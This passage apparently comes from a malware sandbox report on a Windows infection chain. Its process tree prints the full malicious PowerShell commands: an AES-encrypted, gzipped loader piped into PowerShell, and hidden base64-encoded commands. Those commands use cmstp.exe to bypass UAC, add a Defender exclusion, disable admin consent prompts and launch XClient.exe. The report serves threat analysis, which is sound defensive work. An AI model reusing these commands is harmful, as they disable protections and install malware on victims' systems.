LGRUYCe/2GNxqBDVGUIZvVnxgu4/Fn+vjsoD/687g6zdMKyY6tvt/Prik8GVN7k8NYkcr9GPMbrJplZMJwDtke5XNqVev/Y6rxwLCRnZM59cNDC33X0SlEBCo7paNwZXPtKIjtK8AYZWvfg8fZMQXNFeWsL0a6Qidkuul+76QDhva1u3h37WgFtxjzGpHTfIjy/stzYLAZ5b6zwxfdxTp9wBD1JCQhx2+6yjw9yr63fUMzOo+Ho7QUPF3N+20X1z0HjHG78K2LxM9M+8oj8keth96XhaTfhiuOTNn2IUSFnw=';$VlGSTkbht = 'd2VVYnVHQ0NDSFlMTXlFSkxvUGdHaXdVaHBCRWRCS0E=';$SRNaIQFHDizwDgTj = New-Object 'System.Security.Cryptography.AesManaged';$SRNaIQFHDizwDgTj.Mode = [System.Security.Cryptography.CipherMode]::ECB;$SRNaIQFHDizwDgTj.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$SRNaIQFHDizwDgTj.BlockSize = 128;$SRNaIQFHDizwDgTj.KeySize = 256;$SRNaIQFHDizwDgTj.Key = [System.Convert]::FromBase64String($VlGSTkbht);$NwMth = [System.Convert]::FromBase64String($TClKmziEWmosG);$JKhNnvEx = $NwMth[0..15];$SRNaIQFHDizwDgTj.IV = $JKhNnvEx;$mvsducbRAZkUxMqS = $SRNaIQFHDizwDgTj.CreateDecryptor();$yPjGsJSEmjKauUF = $mvsducbRAZkUxMqS.TransformFinalBlock($NwMth, 16, $NwMth.Length - 16);$SRNaIQFHDizwDgTj.Dispose();$xUPO = New-Object System.IO.MemoryStream( , $yPjGsJSEmjKauUF );$YMyEccnrL = New-Object System.IO.MemoryStream;$WMPoNXbMaHhwdvzm = New-Object System.IO.Compression.GzipStream $xUPO, ([IO.Compression.CompressionMode]::Decompress);$WMPoNXbMaHhwdvzm.CopyTo( $YMyEccnrL );$WMPoNXbMaHhwdvzm.Close();$xUPO.Close();[byte[]] $SAXgTOHhY = $YMyEccnrL.ToArray();$cuWCIzLMpJ = [System.Text.Encoding]::UTF8.GetString($SAXgTOHhY);$cuWCIzLMpJ | powershell -
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2672
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe $TClKmziEWmosG = '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';$VlGSTkbht = 'd2VVYnVHQ0NDSFlMTXlFSkxvUGdHaXdVaHBCRWRCS0E=';$SRNaIQFHDizwDgTj = New-Object 'System.Security.Cryptography.AesManaged';$SRNaIQFHDizwDgTj.Mode = [System.Security.Cryptography.CipherMode]::ECB;$SRNaIQFHDizwDgTj.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$SRNaIQFHDizwDgTj.BlockSize = 128;$SRNaIQFHDizwDgTj.KeySize = 256;$SRNaIQFHDizwDgTj.Key = [System.Convert]::FromBase64String($VlGSTkbht);$NwMth = [System.Convert]::FromBase64String($TClKmziEWmosG);$JKhNnvEx = $NwMth[0..15];$SRNaIQFHDizwDgTj.IV = $JKhNnvEx;$mvsducbRAZkUxMqS = $SRNaIQFHDizwDgTj.CreateDecryptor();$yPjGsJSEmjKauUF = $mvsducbRAZkUxMqS.TransformFinalBlock($NwMth, 16, $NwMth.Length - 16);$SRNaIQFHDizwDgTj.Dispose();$xUPO = New-Object System.IO.MemoryStream( , $yPjGsJSEmjKauUF );$YMyEccnrL = New-Object System.IO.MemoryStream;$WMPoNXbMaHhwdvzm = New-Object System.IO.Compression.GzipStream $xUPO, ([IO.Compression.CompressionMode]::Decompress);$WMPoNXbMaHhwdvzm.CopyTo( $YMyEccnrL );$WMPoNXbMaHhwdvzm.Close();$xUPO.Close();[byte[]] $SAXgTOHhY = $YMyEccnrL.ToArray();$cuWCIzLMpJ = [System.Text.Encoding]::UTF8.GetString($SAXgTOHhY);$cuWCIzLMpJ
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1152
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded DQAKAEEAZABkAC0AVAB5AHAAZQAgAC0ATgBhAG0AZQAgAEMAbwBuAHMAbwBsAGUAVQB0AGkAbABzACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAFcAUABJAEEAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACcADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUABvAHMAdABNAGUAcwBzAGEAZwBlACgAaQBuAHQAIABoAFcAbgBkACwAIAB1AGkAbgB0ACAATQBzAGcALAAgAGkAbgB0ACAAdwBQAGEAcgBhAG0ALAAgAGkAbgB0ACAAbABQAGEAcgBhAG0AKQA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbwBuAHMAdAAgAGkAbgB0ACAAVwBNAF8AQwBIAEEAUgAgAD0AIAAwAHgAMAAxADAAMAA7AA0ACgAnAEAADQAKAEYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGkAcAB0ADoAUwBlAHQALQBJAE4ARgBGAGkAbABlACAAewBbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0AUABhAHIAYQBtACAAKAAkAEkAbgBmAEYAaQBsAGUATABvAGMAYQB0AGkAbwBuACAAPQAgACIAJABlAG4AdgA6AHQAZQBtAHAAXABDAE0AUwBUAFAALgBpAG4AZgAiACwAWwBTAHQAcgBpAG4AZwBdACQAQwBvAG0AbQBhAG4AZABUAG8ARQB4AGUAYwB1AHQAZQAgAD0AIAAnAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBMAG8AZwBvACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABoAGkAZABkAGUAbgAgAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlACAALQBOAG8AUAByAG8AZgBpAGwAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AUgBlAHMAdAByAGkAYwB0AGUAZAAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAA7ACcAKQAkAEkAbgBmAEMAbwBuAHQAZQBuAHQAPQBAACIADQAKAFsAdgBlAHIAcwBpAG8AbgBdAA0ACgBTAGkAZwBuAGEAdAB1AHIAZQAgAD0AYAAkAGMAaABpAGMAYQBnAG8AYAAkAA0ACgBBAGQAdgBhAG4AYwBlAGQASQBOAEYAIAA9ACAAMgAuADUADQAKAFsARABlAGYAYQB1AGwAdABJAG4AcwB0AGEAbABsAF0ADQAKAEMAdQBzAHQAbwBtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgAD0AIABDAHUAcwB0AEkAbgBzAHQARABlAHMAdABTAGUAYwB0AGkAbwBuAEEAbABsAFUAcwBlAHIAcwANAAoAUgB1AG4AUAByAGUAUwBlAHQAdQBwAEMAbwBtAG0AYQBuAGQAcwAgAD0AIABSAHUAbgBQAHIAZQBTAGUAdAB1AHAAQwBvAG0AbQBhAG4AZABzAFMAZQBjAHQAaQBvAG4ADQAKAFsAUgB1AG4AUAByAGUAUwBlAHQAdQBwAEMAbwBtAG0AYQBuAGQAcwBTAGUAYwB0AGkAbwBuAF0ADQAKADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAE4AbwBMAG8AZwBvACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABoAGkAZABkAGUAbgAgAC0ATgBvAG4ASQBuAHQAZQByAGEAYwB0AGkAdgBlACAALQBOAG8AUAByAG8AZgBpAGwAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AUgBlAHMAdAByAGkAYwB0AGUAZAAgAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIABSAEUARwBJAFMAVABSAFkAOgA6AEgASwBFAFkAXwBMAE8AQwBBAEwAXwBNAEEAQwBIAEkATgBFAFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUABvAGwAaQBjAGkAZQBzAFwAUwB5AHMAdABlAG0AIAAtAE4AYQBtAGUAIABDAG8AbgBzAGUAbgB0AFAAcgBvAG0AcAB0AEIAZQBoAGEAdgBpAG8AcgBBAGQAbQBpAG4AIAAtAFYAYQBsAHUAZQAgADAADQAKACQAQwBvAG0AbQBhAG4AZABUAG8ARQB4AGUAYwB1AHQAZQANAAoAdABhAHMAawBrAGkAbABsACAALwBJAE0AIABjAG0AcwB0AHAALgBlAHgAZQAgAC8ARgANAAoAWwBDAHUAcwB0AEkAbgBzAHQARABlAHMAdABTAGUAYwB0AGkAbwBuAEEAbABsAFUAcwBlAHIAcwBdAA0ACgA0ADkAMAAwADAALAA0ADkAMAAwADEAPQBBAGwAbABVAFMAZQByAF8ATABEAEkARABTAGUAYwB0AGkAbwBuACwAIAA3AA0ACgBbAEEAbABsAFUAUwBlAHIAXwBMAEQASQBEAFMAZQBjAHQAaQBvAG4AXQANAAoAIgBIAEsATABNACIALAAgACIAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAIABQAGEAdABoAHMAXABDAE0ATQBHAFIAMwAyAC4ARQBYAEUAIgAsACAAIgBQAHIAbwBmAGkAbABlAEkAbgBzAHQAYQBsAGwAUABhAHQAaAAiACwAIAAiACUAVQBuAGUAeABwAGUAYwB0AGUAZABFAHIAcgBvAHIAJQAiACwAIAAiACIADQAKAFsAUwB0AHIAaQBuAGcAcwBdAA0ACgBTAGUAcgB2AGkAYwBlAE4AYQBtAGUAPQAiAE4AbwB0AGUAcABhAGQAIgANAAoAUwBoAG8AcgB0AFMAdgBjAE4AYQBtAGUAPQAiAE4AbwB0AGUAcABhAGQAIgANAAoAIgBAADsAJABJAG4AZgBDAG8AbgB0AGUAbgB0ACAAfAAgAE8AdQB0AC0ARgBpAGwAZQAgACQASQBuAGYARgBpAGwAZQBMAG8AYwBhAHQAaQBvAG4AIAAtAEUAbgBjAG8AZABpAG4AZwAgAEEAUwBDAEkASQB9AEYAdQBuAGMAdABpAG8AbgAgAEcAZQB0AC0ASAB3AG4AZAB7AFsAQwBtAGQAbABlAHQAQgBpAG4AZABpAG4AZwAoACkAXQBQAGEAcgBhAG0AKABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAFQAcgB1AGUALABWAGEAbAB1AGUARgByAG8AbQBQAGkAcABlAGwAaQBuAGUAQgB5AFAAcgBvAHAAZQByAHQAeQBOAGEAbQBlAD0AJABUAHIAdQBlACkAXQBbAHMAdAByAGkAbgBnAF0AJABQAHIAbwBjAGUAcwBzAE4AYQBtAGUAKQBQAHIAbwBjAGUAcwBzAHsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACcAUwB0AG8AcAAnADsAVAByAHkAewAkAGgAdwBuAGQAIAA9ACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACAALQBOAGEAbQBlACAAJABQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAATQBhAGkAbgBXAGkAbgBkAG8AdwBIAGEAbgBkAGwAZQA7AH0AQwBhAHQAYwBoAHsAJABoAHcAbgBkAD0AJABuAHUAbABsADsAfQAkAGgAYQBzAGgAPQBAAHsAUAByAG8AYwBlAHMAcwBOAGEAbQBlAD0AJABQAHIAbwBjAGUAcwBzAE4AYQBtAGUAOwBIAHcAbgBkAD0AJABoAHcAbgBkADsAfQA7AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFAAcwBPAGIAagBlAGMAdAAgAC0AUAByAG8AcABlAHIAdAB5ACAAJABoAGEAcwBoAH0AfQBmAHUAbgBjAHQAaQBvAG4AIABTAGUAdAAtAFcAaQBuAGQAbwB3AEEAYwB0AGkAdgBlAHsAWwBDAG0AZABsAGUAdABCAGkAbgBkAGkAbgBnACgAKQBdAFAAYQByAGEAbQAoAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAVAByAHUAZQAsAFYAYQBsAHUAZQBGAHIAbwBtAFAAaQBwAGUAbABpAG4AZQBCAHkAUAByAG8AcABlAHIAdAB5AE4AYQBtAGUAPQAkAFQAcgB1AGUAKQBdAFsAcwB0AHIAaQBuAGcAXQAkAE4AYQBtAGUAKQBQAHIAbwBjAGUAcwBzAHsAJABoAHcAbgBkAD0ARwBlAHQALQBIAHcAbgBkACAALQBQAHIAbwBjAGUAcwBzAE4AYQBtAGUAIAAkAE4AYQBtAGUAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAASAB3AG4AZAA7AFsAaQBuAHQAXQAkAGgAYQBuAGQAbABlAD0AJABoAHcAbgBkADsAaQBmACgAJABoAGEAbgBkAGwAZQAgAC0AZwB0ACAAMAApAHsAWwB2AG8AaQBkAF0AWwBXAFAASQBBAC4AQwBvAG4AcwBvAGwAZQBVAHQAaQBsAHMAXQA6ADoAUABvAHMAdABNAGUAcwBzAGEAZwBlACgAJABoAGEAbgBkAGwAZQAsAFsAVwBQAEkAQQAuAEMAbwBuAHMAbwBsAGUAVQB0AGkAbABzAF0AOgA6AFcATQBfAEMASABBAFIALAAxADMALAAwACkAfQAkAGgAYQBzAGgAPQBAAHsAUAByAG8AYwBlAHMAcwA9ACQATgBhAG0AZQA7AEgAdwBuAGQAPQAkAGgAdwBuAGQAfQA7AE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFAAcwBPAGIAagBlAGMAdAAgAC0AUAByAG8AcABlAHIAdAB5ACAAJABoAGEAcwBoAH0AfQA7AC4AIABTAGUAdAAtAEkATgBGAEYAaQBsAGUAOwBhAGQAZAAtAHQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsASQBmACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAEkAbgBmAEYAaQBsAGUATABvAGMAYQB0AGkAbwBuACkAewBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAYwBtAHMAdABwACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgACIALwBhAHUAIAAiACIAJABJAG4AZgBGAGkAbABlAEwAbwBjAGEAdABpAG8AbgAiACIAIgAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAATQBpAG4AaQBtAGkAegBlAGQAOwBkAG8AewB9AHUAbgB0AGkAbAAoACgAUwBlAHQALQBXAGkAbgBkAG8AdwBBAGMAdABpAHYAZQAgAGMAbQBzAHQAcAApAC4ASAB3AG4AZAAgAC0AbgBlACAAMAApAH0ADQAKAA==
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1444
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0dhtcnew\0dhtcnew.cmdline"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:1640
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC41B.tmp" "c:\Users\Admin\AppData\Local\Temp\0dhtcnew\CSCD340002034294010A5BAD7C7797E58A7.TMP"
        9⤵
        
        PID:2548
        
        C:\Windows\system32\cmstp.exe
        
        "C:\Windows\system32\cmstp.exe" /au "C:\Users\Admin\AppData\Local\Temp\CMSTP.inf"
        8⤵
        
        PID:632
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -ExecutionPolicy UnRestricted -Encoded DQAKAEEAZABkAC0AVAB5AHAAZQAgAC0ATgBhAG0AZQAgAEMAbwBuAHMAbwBsAGUAVQB0AGkAbABzACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAFcAUABJAEEAIAAtAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIABAACcADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBlAHIAMwAyAC4AZABsAGwAIgApAF0ADQAKAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGkAbgB0ACAAUABvAHMAdABNAGUAcwBzAGEAZwBlACgAaQBuAHQAIABoAFcAbgBkACwAIAB1AGkAbgB0ACAATQBzAGcALAAgAGkAbgB0ACAAdwBQAGEAcgBhAG0ALAAgAGkAbgB0ACAAbABQAGEAcgBhAG0AKQA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbwBuAHMAdAAgAGkAbgB0ACAAVwBNAF8AQwBIAEEAUgAgAD0AIAAwAHgAMAAxADAAMAA7AA0ACgAnAEAADQAKAEYAdQBuAGMAdABpAG8AbgAgAHMAYwByAGkAcAB0ADoAUwBlAHQALQBJAE4ARgBGAGkAbABlACAAewBbAEMAbQBkAGwAZQB0AEIAaQBuAGQAaQBuAGcAKAApAF0AUABhAHIAYQBtACAAKAAkAEkAbgBmAEYAaQBsAGUATABvAGMAYQB0AGkAbwBuACAAPQAgACIAJABlAG4AdgA6AHQAZQBtAHAAXABDAE0AUwBUAFAALgBpAG4AZgAiACwAWwBTAHQAcgBpAG4AZwBdACQAQwBvAG0AbQBhAG4AZABUAG8ARQB4AGUAYwB1AHQAZQAgAD0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAWABDAGwAaQBlAG4AdAAuAGUAeABlACAAJwApACQASQBuAGYAQwBvAG4AdABlAG4AdAA9AEAAIgANAAoAWwB2AGUAcgBzAGkAbwBuAF0ADQAKAFMAaQBnAG4AYQB0AHUA